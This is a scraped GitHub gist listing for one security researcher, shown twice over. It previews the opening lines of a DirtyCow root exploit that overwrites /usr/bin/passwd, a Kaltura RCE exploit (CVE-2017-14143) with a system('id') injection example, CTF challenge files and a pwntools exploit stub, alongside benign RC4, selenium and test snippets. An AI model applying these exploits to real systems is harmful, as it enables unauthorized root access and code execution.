Robin Verton rverton

## cowroot.c
/*
* (un)comment correct payload first (x86 or x64)!
*
* $ gcc cowroot.c -o cowroot -pthread
* $ ./cowroot
* DirtyCow root privilege escalation
* Backing up /usr/bin/passwd.. to /tmp/bak
* Size of binary: 57048
* Racing, this may take a while..
* /usr/bin/passwd overwritten

## chrome_headless_screenshot.py
# Install chromedriver from https://sites.google.com/a/chromium.org/chromedriver/downloads

import os

from optparse import OptionParser

from selenium import webdriver
from selenium.webdriver.chrome.options import Options

CHROME_PATH = '/usr/bin/google-chrome'

## RC4.c
/*
    robin verton, dec 2015
    implementation of the RC4 algo
*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

#define N 256   // 2^8

## test_file_upload.py
from io import BytesIO

def test_file_upload(client):

    data = {
        'field': 'value',
        'file': (BytesIO(b'FILE CONTENT'), 'test.csv')
    }

    rv = client.post('/upload', buffered=True,

## keybase.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              1 star
            
          
                rverton
                / keybase.md
            
            
              Created
              October 25, 2017 13:34
            
          
    Keybase proof

I hereby claim:

I am rverton on github.
I am roob (https://keybase.io/roob) on keybase.
I have a public key ASB7AIRlWYr7z6mxQzopO21ynOCT3d1UjcsegZtkAcnNtwo

To claim this, I am signing this object:

  
## kaltura_unserialize_cookie_rce.py
#!/usr/bin/env python

# Kaltura <= 13.1.0 RCE (CVE-2017-14143)
# https://telekomsecurity.github.io/2017/09/kaltura-rce.html
#
# $ python kaltura_rce.py "https://example.com" 0_xxxxxxxx "system('id')"
# [~] host: https://example.com
# [~] entry_id: 0_xxxxxxxx
# [~] code: system('id')
# [+] sending request..

## bytearray.py
"""
This script generates a bytearray for badchar detection
and is similar to mona.py's bytearray function.

Usage:

    Create bytearray.txt and bytearray.bin (0-255)
    $ python bytearray.py

    Create bytearray.txt and bytearray.bin and exclude chars

## readflag.php
<?php
header('Access-Control-Allow-Origin: *');

$remote = $_SERVER['REMOTE_ADDR'];
if ($remote === '127.0.0.1' || $remote === '::1') {
  $flag = fopen("/flag", "r") or die("Unable to open file!");
  echo fread($flag,filesize("/flag"));
  fclose($flag);
} else {
  echo 'what do you expect to see here?';

## admin_console.php
<?php
session_start();

if ($_COOKIE['tar'] !== 'super-secret-cookie-you-never-know') {
  echo "Try better cookie, bro!";
  die();
}

if (isset($_POST['url']) && isset($_POST['challenge'])) {
  $url = $_POST['url'];

## level1-pwn.py
#!/usr/bin/python

# exploit for level1.bin (nullcon 2017)

from pwn import *

def add_book(p):
    p.sendline('1')
    p.recvuntil('Enter book name: ')
    p.sendline('a')
	/*
	* (un)comment correct payload first (x86 or x64)!
	*
	* $ gcc cowroot.c -o cowroot -pthread
	* $ ./cowroot
	* DirtyCow root privilege escalation
	* Backing up /usr/bin/passwd.. to /tmp/bak
	* Size of binary: 57048
	* Racing, this may take a while..
	* /usr/bin/passwd overwritten
	# Install chromedriver from https://sites.google.com/a/chromium.org/chromedriver/downloads

	import os

	from optparse import OptionParser

	from selenium import webdriver
	from selenium.webdriver.chrome.options import Options

	CHROME_PATH = '/usr/bin/google-chrome'
	/*
	robin verton, dec 2015
	implementation of the RC4 algo
	*/

	#include <stdio.h>
	#include <string.h>
	#include <stdlib.h>

	#define N 256 // 2^8
	from io import BytesIO

	def test_file_upload(client):

	data = {
	'field': 'value',
	'file': (BytesIO(b'FILE CONTENT'), 'test.csv')
	}

	rv = client.post('/upload', buffered=True,
	#!/usr/bin/env python

	# Kaltura <= 13.1.0 RCE (CVE-2017-14143)
	# https://telekomsecurity.github.io/2017/09/kaltura-rce.html
	#
	# $ python kaltura_rce.py "https://example.com" 0_xxxxxxxx "system('id')"
	# [~] host: https://example.com
	# [~] entry_id: 0_xxxxxxxx
	# [~] code: system('id')
	# [+] sending request..
	"""
	This script generates a bytearray for badchar detection
	and is similar to mona.py's bytearray function.

	Usage:

	Create bytearray.txt and bytearray.bin (0-255)
	$ python bytearray.py

	Create bytearray.txt and bytearray.bin and exclude chars
	<?php
	header('Access-Control-Allow-Origin: *');

	$remote = $_SERVER['REMOTE_ADDR'];
	if ($remote === '127.0.0.1' \|\| $remote === '::1') {
	$flag = fopen("/flag", "r") or die("Unable to open file!");
	echo fread($flag,filesize("/flag"));
	fclose($flag);
	} else {
	echo 'what do you expect to see here?';
	<?php
	session_start();

	if ($_COOKIE['tar'] !== 'super-secret-cookie-you-never-know') {
	echo "Try better cookie, bro!";
	die();
	}

	if (isset($_POST['url']) && isset($_POST['challenge'])) {
	$url = $_POST['url'];
	#!/usr/bin/python

	# exploit for level1.bin (nullcon 2017)

	from pwn import *

	def add_book(p):
	p.sendline('1')
	p.recvuntil('Enter book name: ')
	p.sendline('a')